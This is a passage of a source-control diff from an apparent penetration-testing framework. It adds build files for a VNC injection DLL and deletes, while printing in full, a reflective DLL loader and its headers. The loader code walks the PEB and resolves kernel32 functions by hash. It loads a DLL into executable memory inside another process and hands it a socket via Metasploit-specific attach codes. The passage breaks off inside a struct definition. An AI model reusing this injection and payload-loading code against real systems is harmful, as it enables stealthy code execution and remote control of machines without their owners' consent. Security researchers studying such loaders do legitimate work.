<ClInclude Include="context.h" />
<ClInclude Include="loader.h" />
<ClInclude Include="inject.h" />
<ClInclude Include="ps.h" />
<ClInclude Include="session.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="loader.rc" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\winvnc\WinVNC.vcxproj">
<Project>{ea6a09ac-04bb-423d-8842-ca48df901058}</Project>
<ReferenceOutputAssembly>false</ReferenceOutputAssembly>
</ProjectReference>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

65
external/source/vncdll/vncdll/vncdll.vcxproj.filters vendored Executable file
View File

@ -0,0 +1,65 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Source Files\core">
<UniqueIdentifier>{7c56685d-83b5-4541-b5dd-a620ffe19b23}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Header Files\core">
<UniqueIdentifier>{6b6dd5ba-1f40-449f-a55b-7180bb0793a0}</UniqueIdentifier>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="context.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="loader.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="inject.c">
<Filter>Source Files\core</Filter>
</ClCompile>
<ClCompile Include="ps.c">
<Filter>Source Files\core</Filter>
</ClCompile>
<ClCompile Include="session.c">
<Filter>Source Files\core</Filter>
</ClCompile>
<ClCompile Include="..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c">
<Filter>Source Files\core</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="context.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="loader.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="inject.h">
<Filter>Header Files\core</Filter>
</ClInclude>
<ClInclude Include="ps.h">
<Filter>Header Files\core</Filter>
</ClInclude>
<ClInclude Include="session.h">
<Filter>Header Files\core</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="loader.rc">
<Filter>Resource Files</Filter>
</ResourceCompile>
</ItemGroup>
</Project>

53
external/source/vncdll/winvnc/ReflectiveDLLInjection.h vendored
View File

@ -1,53 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
// we declare some common stuff in here...
#define DLL_METASPLOIT_ATTACH 4
#define DLL_METASPLOIT_DETACH 5
#define DLL_QUERY_HMODULE 6
#define DEREF( name )*(UINT_PTR *)(name)
#define DEREF_64( name )*(DWORD64 *)(name)
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
#define DEREF_8( name )*(BYTE *)(name)
typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
#define DLLEXPORT __declspec( dllexport )
//===============================================================================================//
#endif
//===============================================================================================//

457
external/source/vncdll/winvnc/ReflectiveLoader.c vendored
View File

@ -1,457 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "ReflectiveLoader.h"
//===============================================================================================//
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
HINSTANCE hAppInstance = NULL;
//===============================================================================================//
#ifdef _WIN64
#pragma intrinsic( _ReturnAddress )
UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
#endif
//===============================================================================================//
/*
* Use Reflective DLL Injection.
*/
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
// otherwise the DllMain at the end of this file will be used.
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
// This is our position independent reflective DLL loader/injector
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
#else
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
#endif
{
// the functions we need
LOADLIBRARYA pLoadLibraryA;
GETPROCADDRESS pGetProcAddress;
VIRTUALALLOC pVirtualAlloc;
USHORT usCounter;
// the initial location of this image in memory
UINT_PTR uiLibraryAddress;
// the kernels base address and later this images newly loaded base address
UINT_PTR uiBaseAddress;
// variables for processing the kernels export table
UINT_PTR uiAddressArray;
UINT_PTR uiNameArray;
UINT_PTR uiExportDir;
UINT_PTR uiNameOrdinals;
DWORD dwHashValue;
// variables for loading this image
UINT_PTR uiHeaderValue;
UINT_PTR uiValueA;
UINT_PTR uiValueB;
UINT_PTR uiValueC;
UINT_PTR uiValueD;
// STEP 0: calculate our images current base address
// we will start searching backwards from our current EIP
#ifdef _WIN64
uiLibraryAddress = eip();
#else
__asm call geteip
__asm geteip: pop uiLibraryAddress
#endif
// loop through memory backwards searching for our images base address
// we dont need SEH style search as we shouldnt generate any access violations with this
while( TRUE )
{
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
{
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
{
uiHeaderValue += uiLibraryAddress;
// break if we have found a valid MZ/PE header
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
break;
}
}
uiLibraryAddress--;
}
// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
#ifdef _WIN64
uiBaseAddress = __readgsqword( 0x60 );
#else
uiBaseAddress = __readfsdword( 0x30 );
#endif
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr;
// get the first entry of the InMemoryOrder module list
uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
while( uiValueA )
{
// get pointer to current modules name (unicode string)
uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
// set bCounter to the length for the loop
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
// clear uiValueC which will store the hash of the module name
uiValueC = 0;
// compute the hash of the module name...
do
{
uiValueC = ror( (DWORD)uiValueC );
// normalize to uppercase if the madule name is in lowercase
if( *((BYTE *)uiValueB) >= 'a' )
uiValueC += *((BYTE *)uiValueB) - 0x20;
else
uiValueC += *((BYTE *)uiValueB);
uiValueB++;
} while( --usCounter );
// compare the hash with that of kernel32.dll
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
{
// get this modules base address
uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
break;
}
// get the next entry
uiValueA = DEREF( uiValueA );
}
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 3;
// loop while we still have imports to find
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == LOADLIBRARYA_HASH )
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == GETPROCADDRESS_HASH )
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == VIRTUALALLOC_HASH )
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
// STEP 2: load our image into a new permanent location in memory...
// get the VA of the NT Header for the PE to be loaded
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
uiValueB = uiLibraryAddress;
uiValueC = uiBaseAddress;
__movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
// itterate through all sections, loading them into memory.
while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
{
// uiValueB is the VA for this section
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
// uiValueC if the VA for this sections data
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
// copy the section over
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
__movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD );
// get the VA of the next section
uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
// STEP 4: process our images import table...
// uiValueB = the address of the import directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
// we assume their is an import table to process
// uiValueC is the first entry in the import table
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all imports
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
{
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
// uiValueD = VA of the OriginalFirstThunk
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
// itterate through all imported functions, importing by ordinal if no name present
while( DEREF(uiValueA) )
{
// sanity check uiValueD as some compilers only import by FirstThunk
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
{
// get the VA of the modules NT Header
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of addresses
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
// patch in the address for this imported function
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
}
else
{
// get the VA of this functions import by name struct
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
// use GetProcAddress and patch in the address for this imported function
DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
}
// get the next imported function
uiValueA += sizeof( UINT_PTR );
if( uiValueD )
uiValueD += sizeof( UINT_PTR );
}
// get the next import
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
// check if their are any relocations present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// and we itterate through all entries...
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
{
// uiValueA = the VA for this relocation block
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
// uiValueB = number of entries in this relocation block
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
// uiValueD is now the first entry in the current relocation block
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
// we itterate through all the entries in the current block...
while( uiValueB-- )
{
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
// we dont use a switch statement to avoid the compiler building a jump table
// which would not be very position independent!
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
*(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
// get the next entry in the current relocation block
uiValueD += sizeof( IMAGE_RELOC );
}
// get the next entry in the relocation directory
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
}
}
// STEP 6: process the images exception directory if it has one (PE32+ for x64)
/*
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ];
// check if their are any exception etries present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// get the number of entries
uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
// uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all entries
while( uiValueA-- )
{
//((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress
// get the next entry
uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
}
}
*/
// STEP 7: call our images entry point
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
// call our respective entry point, fudging our hInstance value
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
#else
// if we are injecting an DLL via a stub we call DllMain with no parameter
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
#endif
// STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH
return uiValueA;
}
//===============================================================================================//
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// you must implement this function...
extern DWORD DLLEXPORT Init( SOCKET socket );
BOOL MetasploitDllAttach( SOCKET socket )
{
Init( socket );
return TRUE;
}
BOOL MetasploitDllDetach( DWORD dwExitFunc )
{
switch( dwExitFunc )
{
case EXITFUNC_SEH:
SetUnhandledExceptionFilter( NULL );
break;
case EXITFUNC_THREAD:
ExitThread( 0 );
break;
case EXITFUNC_PROCESS:
ExitProcess( 0 );
break;
default:
break;
}
return TRUE;
}
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_METASPLOIT_ATTACH:
bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
break;
case DLL_METASPLOIT_DETACH:
bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
break;
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
#endif
//===============================================================================================//

197
external/source/vncdll/winvnc/ReflectiveLoader.h vendored
View File

@ -1,197 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H
#define _VNCDLL_LOADER_REFLECTIVELOADER_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Winsock2.h>
#include <intrin.h>
#include "ReflectiveDLLInjection.h"
#define EXITFUNC_SEH 0xEA320EFE
#define EXITFUNC_THREAD 0x0A2A1DE0
#define EXITFUNC_PROCESS 0x56A2B5F0
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
#define HASH_KEY 13
//===============================================================================================//
#pragma intrinsic( _rotr )
__forceinline DWORD ror( DWORD d )
{
return _rotr( d, HASH_KEY );
}
__forceinline DWORD hash( char * c )
{
register DWORD h = 0;
do
{
h = ror( h );
h += *c;
} while( *++c );
return h;
}
//===============================================================================================//
typedef struct _UNICODE_STR
{
USHORT Length;
USHORT MaximumLength;
PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
//__declspec( align(8) )
typedef struct _LDR_DATA_TABLE_ENTRY
{
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STR FullDllName;
UNICODE_STR BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
DWORD dwLength;
DWORD dwInitialized;
LPVOID lpSsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
{
struct _PEB_FREE_BLOCK * pNext;
DWORD dwSize;
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
// struct _PEB is defined in Winternl.h but it is incomplete
// WinDbg> dt -v ntdll!_PEB
typedef struct __PEB // 65 elements, 0x210 bytes
{
BYTE bInheritedAddressSpace;
BYTE bReadImageFileExecOptions;
BYTE bBeingDebugged;
BYTE bSpareBool;
LPVOID lpMutant;
LPVOID lpImageBaseAddress;
PPEB_LDR_DATA pLdr;
LPVOID lpProcessParameters;
LPVOID lpSubSystemData;
LPVOID lpProcessHeap;
PRTL_CRITICAL_SECTION pFastPebLock;
LPVOID lpFastPebLockRoutine;
LPVOID lpFastPebUnlockRoutine;
DWORD dwEnvironmentUpdateCount;
LPVOID lpKernelCallbackTable;
DWORD dwSystemReserved;
DWORD dwAtlThunkSListPtr32;
PPEB_FREE_BLOCK pFreeList;
DWORD dwTlsExpansionCounter;
LPVOID lpTlsBitmap;
DWORD dwTlsBitmapBits[2];
LPVOID lpReadOnlySharedMemoryBase;
LPVOID lpReadOnlySharedMemoryHeap;
LPVOID lpReadOnlyStaticServerData;
LPVOID lpAnsiCodePageData;
LPVOID lpOemCodePageData;
LPVOID lpUnicodeCaseTableData;
DWORD dwNumberOfProcessors;
DWORD dwNtGlobalFlag;
LARGE_INTEGER liCriticalSectionTimeout;
DWORD dwHeapSegmentReserve;
DWORD dwHeapSegmentCommit;
DWORD dwHeapDeCommitTotalFreeThreshold;
DWORD dwHeapDeCommitFreeBlockThreshold;
DWORD dwNumberOfHeaps;
DWORD dwMaximumNumberOfHeaps;
LPVOID lpProcessHeaps;
LPVOID lpGdiSharedHandleTable;
LPVOID lpProcessStarterHelper;
DWORD dwGdiDCAttributeList;
LPVOID lpLoaderLock;
DWORD dwOSMajorVersion;
DWORD dwOSMinorVersion;
